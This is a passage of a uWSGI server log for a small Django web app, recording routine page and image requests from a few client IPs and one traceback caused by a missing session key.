vars in 884 bytes} [Thu Jan 14 13:02:22 2021] GET /single/4/ => generated 10499 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2370/3196] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 13:03:05 2021] GET /single/4/ => generated 10485 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3197] 219.228.146.135 () {38 vars in 852 bytes} [Thu Jan 14 13:03:05 2021] GET /static/img/r_photo/8_seeseeme.png => generated 7285 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3198] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 13:03:05 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +here +[pid: 15176|app: 0|req: 2371/3199] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:03:07 2021] POST /single/4/ => generated 27 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2372/3200] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:03:07 2021] GET /single/4/ => generated 10499 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3201] 180.160.48.43 () {40 vars in 867 bytes} [Thu Jan 14 13:03:07 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +here +[pid: 15176|app: 0|req: 2373/3202] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:03:09 2021] POST /single/4/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2374/3203] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:03:09 2021] GET /single/4/ => generated 10499 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2375/3204] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:03:11 2021] GET /single/4/ => generated 10499 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2376/3205] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:03:20 2021] POST /single/4/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2377/3206] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:03:20 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2378/3207] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:03:20 2021] GET /single/4/ => generated 11041 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2379/3208] 219.228.146.135 () {48 vars in 1104 bytes} [Thu Jan 14 13:03:30 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (4 switches on core 1) +[pid: 15176|app: 0|req: 2380/3209] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:03:30 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2381/3210] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:03:30 2021] GET /single/4/ => generated 11561 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3211] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 13:03:30 2021] GET /static/img/r_photo/14_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2382/3212] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:03:38 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2383/3213] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:03:38 2021] GET /single/4/ => generated 11027 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2384/3214] 219.228.146.135 () {48 vars in 1104 bytes} [Thu Jan 14 13:04:05 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 1) +[pid: 15176|app: 0|req: 2385/3215] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:04:05 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2386/3216] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:04:05 2021] GET /single/4/ => generated 11561 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3217] 219.228.146.135 () {40 vars in 907 bytes} [Thu Jan 14 13:04:05 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3218] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 13:04:05 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2387/3219] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:04:14 2021] POST /single/4/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2388/3220] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:04:14 2021] GET /single/4/ => generated 11007 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3221] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 13:04:14 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2389/3222] 180.160.48.43 () {40 vars in 849 bytes} [Thu Jan 14 13:05:51 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2390/3223] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 13:06:02 2021] POST /login/ => generated 27 bytes in 113 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2391/3224] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 13:06:02 2021] GET /home/ => generated 10465 bytes in 33 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2392/3225] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 13:06:06 2021] GET /single/4/ => generated 11009 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3226] 180.160.48.43 () {38 vars in 804 bytes} [Thu Jan 14 13:06:06 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2393/3227] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:06:15 2021] POST /single/4/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2394/3228] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:06:15 2021] GET /single/4/ => generated 10470 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2395/3229] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:06:25 2021] POST /single/4/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2396/3230] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:06:25 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2397/3231] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:06:26 2021] GET /single/4/ => generated 10994 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3232] 180.160.48.43 () {40 vars in 859 bytes} [Thu Jan 14 13:06:26 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2398/3233] 223.104.210.73 () {36 vars in 687 bytes} [Thu Jan 14 13:06:27 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2399/3234] 223.104.210.73 () {36 vars in 689 bytes} [Thu Jan 14 13:06:27 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3235] 223.104.210.73 () {38 vars in 806 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3236] 223.104.210.73 () {38 vars in 784 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3237] 223.104.210.73 () {38 vars in 786 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3238] 223.104.210.73 () {38 vars in 788 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3239] 223.104.210.73 () {38 vars in 792 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3240] 223.104.210.73 () {38 vars in 767 bytes} [Thu Jan 14 13:06:27 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3241] 223.104.210.73 () {38 vars in 765 bytes} [Thu Jan 14 13:06:27 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3242] 223.104.210.73 () {38 vars in 783 bytes} [Thu Jan 14 13:06:28 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3243] 223.104.210.73 () {38 vars in 781 bytes} [Thu Jan 14 13:06:28 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3244] 223.104.210.73 () {38 vars in 773 bytes} [Thu Jan 14 13:06:29 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3245] 223.104.210.73 () {38 vars in 838 bytes} [Thu Jan 14 13:06:30 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2400/3246] 223.104.210.73 () {48 vars in 983 bytes} [Thu Jan 14 13:06:39 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2401/3247] 223.104.210.73 () {40 vars in 868 bytes} [Thu Jan 14 13:06:39 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2402/3248] 223.104.210.73 () {40 vars in 870 bytes} [Thu Jan 14 13:06:40 2021] GET /home/ => generated 10463 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3249] 223.104.210.73 () {38 vars in 897 bytes} [Thu Jan 14 13:06:40 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3250] 223.104.210.73 () {38 vars in 891 bytes} [Thu Jan 14 13:06:40 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2403/3251] 223.104.210.73 () {40 vars in 875 bytes} [Thu Jan 14 13:06:42 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2404/3252] 223.104.210.73 () {40 vars in 877 bytes} [Thu Jan 14 13:06:43 2021] GET /single/2/ => generated 9514 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3253] 223.104.210.73 () {38 vars in 826 bytes} [Thu Jan 14 13:06:43 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3254] 223.104.210.73 () {38 vars in 828 bytes} [Thu Jan 14 13:06:43 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2405/3255] 223.104.210.73 () {40 vars in 891 bytes} [Thu Jan 14 13:06:56 2021] GET /home/single.html => generated 10463 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2406/3256] 223.104.210.73 () {40 vars in 886 bytes} [Thu Jan 14 13:06:59 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2407/3257] 223.104.210.73 () {40 vars in 888 bytes} [Thu Jan 14 13:06:59 2021] GET /single/4/ => generated 10878 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3258] 223.104.210.73 () {38 vars in 895 bytes} [Thu Jan 14 13:06:59 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3259] 223.104.210.73 () {38 vars in 895 bytes} [Thu Jan 14 13:06:59 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2408/3260] 223.104.210.73 () {46 vars in 1032 bytes} [Thu Jan 14 13:09:29 2021] POST /single/4/ => generated 0 bytes in 507 msecs (HTTP/1.1 302) 7 headers in 202 bytes (41 switches on core 1) +[pid: 15176|app: 0|req: 2409/3261] 223.104.210.73 () {42 vars in 921 bytes} [Thu Jan 14 13:09:30 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2410/3262] 223.104.210.73 () {42 vars in 923 bytes} [Thu Jan 14 13:09:30 2021] GET /single/4/ => generated 11383 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3263] 223.104.210.73 () {40 vars in 950 bytes} [Thu Jan 14 13:09:30 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3264] 223.104.210.73 () {38 vars in 961 bytes} [Thu Jan 14 13:09:30 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2411/3265] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:09:32 2021] GET /single/4/ => generated 11537 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3266] 180.160.48.43 () {40 vars in 859 bytes} [Thu Jan 14 13:09:32 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3267] 180.160.48.43 () {38 vars in 870 bytes} [Thu Jan 14 13:09:32 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2412/3268] 223.104.210.73 () {46 vars in 1029 bytes} [Thu Jan 14 13:09:50 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2413/3269] 223.104.210.73 () {42 vars in 921 bytes} [Thu Jan 14 13:09:50 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2414/3270] 223.104.210.73 () {42 vars in 923 bytes} [Thu Jan 14 13:09:50 2021] GET /single/4/ => generated 11867 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3271] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:09:50 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2415/3272] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:09:57 2021] POST /single/4/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2416/3273] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:09:57 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2417/3274] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:09:57 2021] GET /single/4/ => generated 12574 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3275] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:09:57 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2418/3276] 223.104.210.73 () {48 vars in 1036 bytes} [Thu Jan 14 13:10:20 2021] POST /single/4/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2419/3277] 223.104.210.73 () {40 vars in 881 bytes} [Thu Jan 14 13:10:20 2021] GET /single/4/ => generated 11860 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3278] 223.104.210.73 () {40 vars in 950 bytes} [Thu Jan 14 13:10:20 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3279] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:10:20 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2420/3280] 223.104.210.73 () {48 vars in 1036 bytes} [Thu Jan 14 13:12:06 2021] POST /single/4/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2421/3281] 223.104.210.73 () {40 vars in 881 bytes} [Thu Jan 14 13:12:06 2021] GET /single/4/ => generated 11364 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3282] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:12:06 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2422/3283] 180.160.48.43 () {48 vars in 1064 bytes} [Thu Jan 14 13:13:04 2021] POST /single/4/ => generated 0 bytes in 57 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 0) +[pid: 15176|app: 0|req: 2423/3284] 180.160.48.43 () {42 vars in 912 bytes} [Thu Jan 14 13:13:04 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2424/3285] 180.160.48.43 () {42 vars in 914 bytes} [Thu Jan 14 13:13:04 2021] GET /single/4/ => generated 12034 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3286] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 13:13:04 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3287] 180.160.48.43 () {38 vars in 805 bytes} [Thu Jan 14 13:13:04 2021] GET /static/img/r_photo/20_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2425/3288] 180.160.48.43 () {48 vars in 1064 bytes} [Thu Jan 14 13:13:12 2021] POST /single/4/ => generated 0 bytes in 45 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 0) +[pid: 15176|app: 0|req: 2426/3289] 180.160.48.43 () {42 vars in 912 bytes} [Thu Jan 14 13:13:12 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2427/3290] 180.160.48.43 () {42 vars in 914 bytes} [Thu Jan 14 13:13:12 2021] GET /single/4/ => generated 12550 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3291] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 13:13:12 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3292] 180.160.48.43 () {38 vars in 805 bytes} [Thu Jan 14 13:13:12 2021] GET /static/img/r_photo/21_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2428/3293] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:13:55 2021] GET /single/4/ => generated 12548 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3294] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3295] 219.228.146.135 () {38 vars in 910 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3296] 219.228.146.135 () {38 vars in 846 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/20_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3297] 219.228.146.135 () {38 vars in 846 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/21_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3298] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 13:13:59 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2429/3299] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:14:33 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2430/3300] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:14:33 2021] GET /single/4/ => generated 12034 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3301] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:14:33 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3302] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:14:33 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2431/3303] 183.192.164.71 () {32 vars in 564 bytes} [Thu Jan 14 13:14:58 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/single.html +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 15176|app: 0|req: 2432/3304] 120.204.17.71 () {32 vars in 583 bytes} [Thu Jan 14 13:15:20 2021] GET /home/single.html => generated 60419 bytes in 50 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2433/3305] 120.204.17.72 () {32 vars in 567 bytes} [Thu Jan 14 13:15:50 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2434/3306] 219.228.146.135 () {48 vars in 1103 bytes} [Thu Jan 14 13:18:57 2021] POST /single/4/ => generated 0 bytes in 28 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2435/3307] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:18:57 2021] GET /single/4 => generated 0 